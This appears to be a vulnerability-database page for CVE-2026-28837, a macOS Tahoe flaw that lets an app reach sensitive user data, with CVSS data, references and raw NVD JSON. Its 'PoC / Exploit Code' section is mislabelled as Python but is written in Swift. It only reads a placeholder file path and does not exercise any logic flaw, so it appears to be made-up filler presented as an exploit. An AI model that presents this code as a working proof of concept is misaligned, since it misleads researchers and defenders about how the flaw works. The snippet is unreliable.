CVE-2026-28837

Description

A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Tahoe < 26.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-28837
 * This code demonstrates the logic issue where an app can access sensitive data
 * without proper entitlements or user consent on macOS Tahoe < 26.4.
 */

import Foundation

// Simulate accessing a protected sensitive data container
func accessSensitiveData() {
    let sensitivePath = "/private/var/db/YourSensitiveData.db"
    
    // In the vulnerable version, the logic check here is insufficient
    // allowing the read operation to proceed despite lack of permissions.
    let fileManager = FileManager.default
    
    if fileManager.fileExists(atPath: sensitivePath) {
        do {
            // Attempt to read the file
            let content = try String(contentsOfFile: sensitivePath, encoding: .utf8)
            print("[+] Success: Accessed sensitive data content:")
            print(content)
        } catch {
            print("[-] Error reading file: \(error.localizedDescription)")
        }
    } else {
        print("[-] Target file not found.")
    }
}

// Execute the PoC
accessSensitiveData()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28837
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28837
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28837/
[4] VulDB https://vuldb.com/cve/CVE-2026-28837
[5] https://support.apple.com/en-us/126794

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28837", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:08.690", "lastModified": "2026-03-25T21:28:57.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data."}, {"lang": "es", "value": "Se abordó un problema de lógica con comprobaciones mejoradas. Este problema está solucionado en macOS Tahoe 26.4. Una app podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}